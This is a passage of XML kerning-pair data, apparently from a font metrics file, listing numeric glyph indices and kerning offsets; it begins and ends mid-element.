kpx2="180"/><pair kern="-54" kpx2="197"/><pair kern="-44" kpx2="181"/></kerning><kerning kpx1="59"><pair kern="-72" kpx2="100"/><pair kern="-63" kpx2="210"/><pair kern="-17" kpx2="55"/><pair kern="-44" kpx2="114"/><pair kern="-44" kpx2="72"/><pair kern="-63" kpx2="175"/><pair kern="-49" kpx2="16"/><pair kern="-63" kpx2="50"/><pair kern="-63" kpx2="209"/><pair kern="-44" kpx2="112"/><pair kern="-72" kpx2="251"/><pair kern="-63" kpx2="103"/><pair kern="-63" kpx2="208"/><pair kern="-44" kpx2="113"/><pair kern="-40" kpx2="181"/><pair kern="-77" kpx2="180"/><pair kern="-54" kpx2="169"/><pair kern="-21" kpx2="197"/><pair kern="-72" kpx2="38"/><pair kern="-72" kpx2="253"/><pair kern="-44" kpx2="115"/></kerning><kerning kpx1="73"><pair kern="31" kpx2="180"/><pair kern="-17" kpx2="90"/><pair kern="-72" kpx2="17"/><pair kern="-17" kpx2="235"/><pair kern="-35" kpx2="169"/><pair kern="-114" kpx2="197"/><pair kern="-17" kpx2="186"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="87"/><pair kern="-54" kpx2="16"/><pair kern="-35" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="41"><pair kern="-17" kpx2="227"/><pair kern="-54" kpx2="126"/><pair kern="-91" kpx2="107"/><pair kern="-91" kpx2="235"/><pair kern="-54" kpx2="72"/><pair kern="-91" kpx2="199"/><pair kern="-35" kpx2="123"/><pair kern="-54" kpx2="112"/><pair kern="-54" kpx2="113"/><pair kern="-17" kpx2="54"/><pair kern="-21" kpx2="180"/><pair kern="-91" kpx2="105"/><pair kern="-54" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-91" kpx2="201"/><pair kern="-72" kpx2="85"/><pair kern="-91" kpx2="106"/><pair kern="-77" kpx2="29"/><pair kern="-35" kpx2="125"/><pair kern="-54" kpx2="115"/><pair kern="-54" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-91" kpx2="68"/><pair kern="-91" kpx2="36"/><pair kern="-35" kpx2="82"/><pair kern="-91" kpx2="186"/><pair kern="-17" kpx2="55"/><pair kern="-54" kpx2="114"/><pair kern="-54" kpx2="127"/><pair kern="-91" kpx2="108"/><pair kern="-91" kpx2="98"/><pair kern="-72" kpx2="76"/><pair kern="-160" kpx2="17"/><pair kern="-54" kpx2="128"/><pair kern="-91" kpx2="173"/><pair kern="-91" kpx2="109"/><pair kern="-183" kpx2="197"/><pair kern="-91" kpx2="92"/><pair kern="-35" kpx2="121"/><pair kern="-91" kpx2="110"/><pair kern="-91" kpx2="174"/><pair kern="-17" kpx2="249"/></kerning><kerning kpx1="124"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="169"><pair kern="-17" kpx2="90"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="246"/><pair kern="-17" kpx2="235"/><pair kern="-17" kpx2="58"/><pair kern="-17" kpx2="186"/><pair kern="-54" kpx2="55"/><pair kern="-17" kpx2="251"/><pair kern="-72" kpx2="187"/><pair kern="-17" kpx2="39"/><pair kern="73" kpx2="144"/><pair kern="-17" kpx2="45"/><pair kern="-17" kpx2="92"/><pair kern="-17" kpx2="38"/><pair kern="-72" kpx2="60"/><pair kern="-17" kpx2="89"/><pair kern="-17" kpx2="253"/><pair kern="-54" kpx2="57"/><pair kern="-17" kpx2="37"/><pair kern="-17" kpx2="42"/><pair kern="-72" kpx2="234"/></kerning><kerning kpx1="201"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="60"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="85"><pair kern="-21" kpx2="254"/><pair kern="-21" kpx2="72"/><pair kern="-63" kpx2="16"/><pair kern="-21" kpx2="112"/><pair kern="-21" kpx2="123"/><pair kern="-17" kpx2="80"/><pair kern="-21" kpx2="113"/><pair kern="-17" kpx2="71"/><pair kern="-21" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-21" kpx2="252"/><pair kern="-21" kpx2="70"/><pair kern="-17" kpx2="85"/><pair kern="-17" kpx2="29"/><pair kern="-21" kpx2="125"/><pair kern="-21" kpx2="115"/><pair kern="-21" kpx2="111"/><pair kern="-21" kpx2="122"/><pair kern="-21" kpx2="82"/><pair kern="-17" kpx2="75"/><pair kern="-21" kpx2="114"/><pair kern="-26" kpx2="91"/><pair kern="-17" kpx2="81"/><pair kern="41" kpx2="181"/><pair kern="-91" kpx2="17"/><pair kern="-151" kpx2="197"/><pair kern="-17" kpx2="74"/><pair kern="-17" kpx2="84"/><pair kern="-21" kpx2="121"/><pair kern="-17" kpx2="247"/><pair kern="-17" kpx2="120"/></kerning><kerning kpx1="61"><pair kern="-17" kpx2="180"/><pair kern="-17" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="234"><pair kern="-114" kpx2="126"/><pair kern="-137" kpx2="107"/><pair kern="-132" kpx2="72"/><pair kern="-77" kpx2="199"/><pair kern="-118" kpx2="16"/><pair kern="-132" kpx2="123"/><pair kern="-132" kpx2="112"/><pair kern="-54" kpx2="251"/><pair kern="-54" kpx2="208"/><pair kern="-132" kpx2="113"/><pair kern="-54" kpx2="180"/><pair kern="-137" kpx2="105"/><pair kern="-114" kpx2="129"/><pair kern="-132" kpx2="124"/><pair kern="-109" kpx2="169"/><pair kern="-77" kpx2="201"/><pair kern="-54" kpx2="253"/><pair kern="-137" kpx2="106"/><pair kern="-132" kpx2="29"/><pair kern="-132" kpx2="125"/><pair kern="-72" kpx2="170"/><pair kern="-132" kpx2="115"/><pair kern="-114" kpx2="88"/><pair kern="-132" kpx2="122"/><pair kern="-54" kpx2="100"/><pair kern="-137" kpx2="68"/><pair kern="-54" kpx2="210"/><pair kern="-77" kpx2="36"/><pair kern="-132" kpx2="82"/><pair kern="-132" kpx2="114"/><pair kern="-54" kpx2="175"/><pair kern="-114" kpx2="127"/><pair kern="-54" kpx2="50"/><pair kern="-54" kpx2="209"/><pair kern="-54" kpx2="103"/><pair kern="-137" kpx2="108"/><pair kern="-77" kpx2="98"/><pair kern="-35" kpx2="76"/><pair kern="-17" kpx2="181"/><pair kern="-202" kpx2="17"/><pair kern="-114" kpx2="128"/><pair kern="-77" kpx2="173"/><pair kern="-137" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-54" kpx2="38"/><pair kern="-132" kpx2="121"/><pair kern="-137" kpx2="110"/><pair kern="-77" kpx2="174"/></kerning><kerning kpx1="100"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="122"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="47"><pair kern="-17" kpx2="126"/><pair kern="-91" kpx2="235"/><pair kern="-49" kpx2="104"/><pair kern="-17" kpx2="72"/><pair kern="22" kpx2="199"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-49" kpx2="213"/><pair kern="-35" kpx2="208"/><pair kern="-132" kpx2="187"/><pair kern="-17" kpx2="113"/><pair kern="-202" kpx2="180"/><pair kern="-17" kpx2="129"/><pair kern="-17" kpx2="124"/><pair kern="22" kpx2="201"/><pair kern="-132" kpx2="60"/><pair kern="-49" kpx2="211"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="115"/><pair kern="-132" kpx2="234"/><pair kern="-17" kpx2="88"/><pair kern="-17" kpx2="122"/><pair kern="-35" kpx2="210"/><pair kern="22" kpx2="36"/><pair kern="-17" kpx2="82"/><pair kern="-91" kpx2="58"/><pair kern="-91" kpx2="186"/><pair kern="-137" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-35" kpx2="175"/><pair kern="-17" kpx2="127"/><pair kern="-35" kpx2="50"/><pair kern="-35" kpx2="209"/><pair kern="-35" kpx2="103"/><pair kern="22" kpx2="98"/><pair kern="-262" kpx2="181"/><pair kern="-17" kpx2="128"/><pair kern="22" kpx2="173"/><pair kern="-49" kpx2="212"/><pair kern="-91" kpx2="92"/><pair kern="-17" kpx2="121"/><pair kern="-109" kpx2="57"/><pair kern="22" kpx2="174"/><pair kern="-49" kpx2="56"/></kerning><kerning kpx1="210"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="58"><pair kern="-35" kpx2="126"/><pair kern="-63" kpx2="107"/><pair kern="-17" kpx2="235"/><pair kern="-58" kpx2="72"/><pair kern="-54" kpx2="199"/><pair kern="-40" kpx2="16"/><pair kern="-58" kpx2="112"/><pair kern="-58" kpx2="123"/><pair kern="-58" kpx2="113"/><pair kern="-17" kpx2="180"/><pair kern="-63" kpx2="105"/><pair kern="-35" kpx2="129"/><pair kern="-58" kpx2="124"/><pair kern="-54" kpx2="169"/><pair kern="-54" kpx2="201"/><pair kern="-44" kpx2="85"/><pair kern="-63" kpx2="106"/><pair kern="-58" kpx2="29"/><pair kern="-58" kpx2="125"/><pair kern="-17" kpx2="170"/><pair kern="-58" kpx2="115"/><pair kern="-35" kpx2="88"/><pair kern="-58" kpx2="122"/><pair kern="-63" kpx2="68"/><pair kern="-54" kpx2="36"/><pair kern="-58" kpx2="82"/><pair kern="-17" kpx2="186"/><pair kern="-58" kpx2="114"/><pair kern="-35" kpx2="127"/><pair kern="-63" kpx2="108"/><pair kern="-54" kpx2="98"/><pair kern="-21" kpx2="76"/><pair kern="-114" kpx2="17"/><pair kern="-35" kpx2="128"/><pair kern="-54" kpx2="173"/><pair kern="-63" kpx2="109"/><pair kern="-128" kpx2="197"/><pair kern="-17" kpx2="92"/><pair kern="-58" kpx2="121"/><pair kern="-63" kpx2="110"/><pair kern="-54" kpx2="174"/></kerning><kerning kpx1="82"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="186"><pair kern="-142" kpx2="17"/><pair kern="-17" kpx2="169"/><pair kern="-146" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-72" kpx2="29"/><pair kern="-17" kpx2="170"/></kerning><kerning kpx1="175"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="209"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="103"><pair kern="-17" kpx2="36"/><pair kern="-17" kpx2="199"/><pair kern="27" kpx2="16"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="98"/><pair kern="-17" kpx2="181"/><pair kern="-63" kpx2="59"/><pair kern="-40" kpx2="17"/><pair kern="-21" kpx2="180"/><pair kern="-17" kpx2="173"/><pair kern="-17" kpx2="169"/><pair kern="-91" kpx2="197"/><pair kern="-17" kpx2="201"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="29"/><pair kern="-17" kpx2="57"/><pair kern="-17" kpx2="174"/><pair kern="-54" kpx2="234"/></kerning><kerning kpx1="81"><pair kern="-72" kpx2="180"/><pair kern="-44" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="98"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="212"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="229"><pair kern="-17" kpx2="180"/><pair kern="-17" kpx2="197"/><pair kern="-17" kpx2="16"/><pair kern="-17" kpx2="181"/></kerning><kerning kpx1="38"><pair kern="-17" kpx2="169"/><pair kern="-17" kpx2="60"/><pair kern="-17" kpx2="187"/><pair kern="18" kpx2="181"/><pair kern="-17" kpx2="170"/><pair kern="-17" kpx2="234"/></kerning><kerning kpx1="121"><pair kern="-72" kpx2="180"/><pair kern="-17" kpx2="17"/><pair kern="-63" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-30" kpx2="91"/><pair kern="-35" kpx2="181"/></kerning><kerning kpx1="57"><pair kern="-67" kpx2="126"/><pair kern="-77" kpx2="107"/><pair kern="-26" kpx2="235"/><pair kern="-77" kpx2="72"/><pair kern="-63" kpx2="199"/><pair kern="-58" kpx2="16"/><pair kern="-77" kpx2="123"/><pair kern="-77" kpx2="112"/><pair kern="-17" kpx2="208"/><pair kern="-77" kpx2="113"/><pair kern="-77" kpx2="105"/><pair kern="-67" kpx2="129"/><pair kern="-77" kpx2="124"/><pair kern="-86" kpx2="169"/><pair kern="-63" kpx2="201"/><pair kern="-77" kpx2="106"/><pair kern="-81" kpx2="29"/><pair kern="-77" kpx2="125"/><pair kern="-54" kpx2="170"/><pair kern="-77" kpx2="115"/><pair kern="-67" kpx2="88"/><pair kern="-77" kpx2="122"/><pair kern="-77" kpx2="68"/><pair kern="-17" kpx2="210"/><pair kern="-63" kpx2="36"/><pair kern="-77" kpx2="82"/><pair kern="-26" kpx2="186"/><pair kern="-77" kpx2="114"/><pair kern="-17" kpx2="175"/><pair kern="-67" kpx2="127"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-77" kpx2="108"/><pair kern="-63" kpx2="98"/><pair kern="-21" kpx2="76"/><pair kern="-128" kpx2="17"/><pair kern="-67" kpx2="128"/><pair kern="-63" kpx2="173"/><pair kern="-77" kpx2="109"/><pair kern="-137" kpx2="197"/><pair kern="-26" kpx2="92"/><pair kern="-77" kpx2="121"/><pair kern="-77" kpx2="110"/><pair kern="-63" kpx2="174"/></kerning><kerning kpx1="37"><pair kern="-17" kpx2="227"/><pair kern="-17" kpx2="246"/><pair kern="-17" kpx2="251"/><pair kern="-54" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-17" kpx2="54"/><pair kern="-54" kpx2="180"/><pair kern="-30" kpx2="169"/><pair kern="-54" kpx2="60"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="170"/><pair kern="-54" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="210"/><pair kern="-35" kpx2="58"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="50"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="-54" kpx2="181"/><pair kern="-40" kpx2="197"/><pair kern="-17" kpx2="38"/><pair kern="-30" kpx2="57"/><pair kern="-17" kpx2="249"/></kerning><kerning kpx1="120"><pair kern="-72" kpx2="180"/><pair kern="-44" kpx2="197"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="249"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="227"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="51"><pair kern="-17" kpx2="126"/><pair kern="-44" kpx2="107"/><pair kern="-35" kpx2="72"/><pair kern="-63" kpx2="199"/><pair kern="-21" kpx2="16"/><pair kern="-35" kpx2="123"/><pair kern="-35" kpx2="112"/><pair kern="-21" kpx2="187"/><pair kern="-35" kpx2="113"/><pair kern="-17" kpx2="86"/><pair kern="18" kpx2="180"/><pair kern="-44" kpx2="105"/><pair kern="-17" kpx2="129"/><pair kern="-35" kpx2="124"/><pair kern="-17" kpx2="169"/><pair kern="-63" kpx2="201"/><pair kern="-17" kpx2="85"/><pair kern="-21" kpx2="60"/><pair kern="-44" kpx2="106"/><pair kern="-35" kpx2="125"/><pair kern="-35" kpx2="115"/><pair kern="-21" kpx2="234"/><pair kern="-17" kpx2="88"/><pair kern="-35" kpx2="122"/><pair kern="-44" kpx2="68"/><pair kern="-63" kpx2="36"/><pair kern="-35" kpx2="82"/><pair kern="-35" kpx2="114"/><pair kern="-17" kpx2="250"/><pair kern="-17" kpx2="127"/><pair kern="-44" kpx2="108"/><pair kern="-63" kpx2="98"/><pair kern="-17" kpx2="81"/><pair kern="-21" kpx2="76"/><pair kern="18" kpx2="181"/><pair kern="-155" kpx2="17"/><pair kern="-17" kpx2="128"/><pair kern="-63" kpx2="173"/><pair kern="-44" kpx2="109"/><pair kern="-160" kpx2="197"/><pair kern="-35" kpx2="121"/><pair kern="-17" kpx2="228"/><pair kern="-44" kpx2="110"/><pair kern="-63" kpx2="174"/><pair kern="-17" kpx2="120"/></kerning><kerning kpx1="104"><pair kern="-17" kpx2="229"/><pair kern="-17" kpx2="61"/></kerning><kerning kpx1="72"><pair kern="-17" kpx2="91"/></kerning><kerning kpx1="199"><pair kern="-17" kpx2="246"/><pair kern="-67" kpx2="235"/><pair kern="-21" kpx2="16"/><pair kern="-17" kpx2="112"/><pair kern="-17" kpx2="123"/><pair kern="-17" kpx2="251"/><pair kern="-17" kpx2="113"/><pair kern="-77" kpx2="187"/><pair kern="-17" kpx2="208"/><pair kern="-35" kpx2="73"/><pair kern="-17" kpx2="124"/><pair kern="-35" kpx2="169"/><pair kern="-17" kpx2="252"/><pair kern="-17" kpx2="70"/><pair kern="-77" kpx2="60"/><pair kern="27" kpx2="201"/><pair kern="-17" kpx2="29"/><pair kern="-77" kpx2="234"/><pair kern="-17" kpx2="100"/><pair kern="-17" kpx2="122"/><pair kern="-17" kpx2="210"/><pair kern="-17" kpx2="82"/><pair kern="-54" kpx2="58"/><pair kern="-67" kpx2="186"/><pair kern="-17" kpx2="175"/><pair kern="-17" kpx2="209"/><pair kern="-17" kpx2="103"/><pair kern="27" kpx2="98"/><pair kern="-123" kpx2="181"/><pair kern="-17" kpx2="17"/><pair kern="-17" kpx2="38"/><pair kern="-17" kpx2="84"/><pair kern="-17" kpx2="121"/><pair kern="-63" kpx2="57"/><pair kern="-17" kpx2="254"/><pair kern="-17" kpx2="87"/><pair kern="-17" kpx2="72"/><pair kern="27" kpx2="199"/><pair kern="-17" kpx2="71"/><pair kern="-128" kpx2="180"/><pair kern="-17" kpx2="253"/><pair kern="-17" kpx2="52"/><pair kern="-17" kpx2="125"/><pair kern="-17" kpx2="42"/><pair kern="-17" kpx2="115"/><pair kern="-40" kpx2="90"/><pair kern="-17" kpx2="111"/><pair kern="27" kpx2="36"/><pair kern="-77" kpx2="55"/><pair kern="-17" kpx2="114"/><pair kern="-17" kpx2="50"/><pair kern="27" kpx2="173"/><pair kern="-67" kpx2="92"/><pair kern="22" kpx2="197"/><pair kern="-58" kpx2="89"/><pair kern="27" kpx2="174"/></kerning><kerning kpx1="54"><pair kern="18" kpx2="173"/><pair kern="18" kpx2="36"/><pair kern="18" kpx2="201"/><pair kern="18" kpx2="199"/><pair kern="18" kpx2="174"/><pair kern="18" kpx2="98"/></kerning><kerning kpx1="180"><pair kern="-35" kpx2="235"/><pair kern="-35" kpx2="246"/><pair kern="-30" kpx2="43"/><pair kern="-72" kpx2="123"/><pair kern="-35" kpx2="251"/><pair kern="-35" kpx2="208"/><pair kern="-188" kpx2="144"/><pair kern="-58" kpx2="59"/><pair kern="-35" kpx2="73"/><pair kern="-30" kpx2="41"/><pair kern="-72" kpx2="124"/><pair kern="-54" kpx2="85"/><pair kern="-128" kpx2="201"/><pair kern="-17" kpx2="61"/><pair kern="-35" kpx2="100"/><pair kern="-72" kpx2="122"/><pair kern="-30" kpx2="47"/><pair kern="-35" kpx2="210"/><pair kern="-72" kpx2="82"/><pair kern="-35" kpx2="186"/><pair kern="-35" kpx2="175"/><pair kern="-35" kpx2="209"/><pair kern="-35" kpx2="103"/><pair kern="-128" kpx2="98"/><pair kern="-54" kpx2="81"/><pair kern="-17" kpx2="229"/><pair kern="-35" kpx2="38"/><pair kern="-72" kpx2="121"/><pair kern="-30" kpx2="37"/><pair kern="-54" kpx2="120"/><pair kern="-30" kpx2="51"/><pair kern="-128" kpx2="199"/><pair kern="-30" kpx2="53"/><pair kern="-30" kpx2="137"/><pair kern="-35" kpx2="233"/><pair kern="-35" kpx2="253"/><pair kern="-35" kpx2="52"/><pair kern="-72" kpx2="125"/><pair kern="-35" kpx2="42"/><pair kern="-35" kpx2="90"/><pair kern="-128" kpx2="36"/><pair kern="-35" kpx2="50"/><pair kern="-30" kpx2="39"/><pair kern="-30" kpx2="236"/><pair kern="-30" kpx2="45"/><pair kern="-128" kpx2="173"/><pair kern="-35" kpx2="92"/><pair kern="-35" kpx2="89"/><pair kern="-30" kpx2="46"/><pair kern="-128" kpx2="174"/></kerning><kerning kpx1="53"><pair kern="-21" kpx2="107"/><pair kern="-54" kpx2="235"/><pair kern="-40" kpx2="16"/><pair kern="-44" kpx2="112"/><pair kern="-44" kpx2="123"/><pair kern="-49" kpx2="251"/><pair kern="-44" kpx2="113"/><pair kern="-63" kpx2="187"/><pair kern="-44" kpx2="129"/><pair kern="-44" kpx2="124"/><pair kern="-54" kpx2="169"/><pair kern="-63" kpx2="60"/><pair kern="-40" kpx2="201"/><pair kern="-21" kpx2="106"/><pair kern="-30" kpx2="29"/><pair kern="-63" kpx2="234"/><pair kern="-49" kpx2="100"/><pair kern="-44" kpx2="122"/><pair kern="-21" kpx2="68"/><pair kern="-40" kpx2="58"/><pair kern="-44" kpx2="82"/><pair kern="-54" kpx2="186"/><pair kern="-40" kpx2="98"/><pair kern="-63" kpx2="181"/><pair kern="-35" kpx2="17"/><pair kern="-49" kpx2="38"/><pair kern="-44" kpx2="121"/><pair kern="-54" kpx2="57"/><pair kern="-44" kpx2="126"/><pair kern="-44" kpx2="72"/><pair kern="-40" kpx2="199"/><pair kern="-72" kpx2="180"/><pair kern="-21" kpx2="105"/><pair kern="-49" kpx2="253"/><pair kern="-44" kpx2="125"/><pair kern="-44" kpx2="115"/><pair kern="-17" kpx2="170"/><pair kern="-44" kpx2="88"/><pair kern="-40" kpx2="36"/><pair kern="-44" kpx2="114"/><pair kern="-72" kpx2="55"/><pair kern="-44" kpx2="127"/><pair kern="-21" kpx2="108"/><pair kern="-44" kpx2="128"/><pair kern="-40" kpx2="173"/><pair kern="-21" kpx2="109"/><pair kern="-54" kpx2="92"/><pair kern="-17" kpx2="197"/><pair kern="-21" kpx2="110"/><pair kern="-40" kpx2="174"/></kerning><kerning kpx1="137"><pair kern="-54" kpx2="180"/><pair kern="-40" kpx2="197"/><pair kern="18" kpx2="16"/><pair kern="-54" kpx2="181"/></kerning><kerning kpx1="233"><pair kern="-44" 